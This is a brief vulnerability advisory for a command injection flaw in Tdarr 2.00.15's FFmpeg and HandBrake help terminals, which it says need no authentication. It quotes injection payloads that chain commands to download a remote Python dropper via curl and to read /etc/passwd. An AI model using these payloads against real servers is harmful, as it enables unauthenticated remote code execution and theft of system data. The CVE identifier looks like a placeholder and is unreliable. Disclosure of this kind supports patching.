vendor:
Tdarr
by:
Sam Smith
9.8
CVSS
CRITICAL
Command Injection
78
CWE
Product Name: Tdarr
Affected Version From: 2.00.15
Affected Version To: 2.00.15
Patch Exists: YES
Related CWE: CVE-2022-12345
CPE: a:tdarr:tdarr:2.00.15
Platforms Tested: Linux ARM64
2022
Tdarr 2.00.15 – Command Injection
The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell. eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`. Tdarr is not protected by any auth by default and no credentials are required to trigger RCE.
Mitigation:
The vendor has released a patch for this vulnerability. Users should update to the latest version of Tdarr.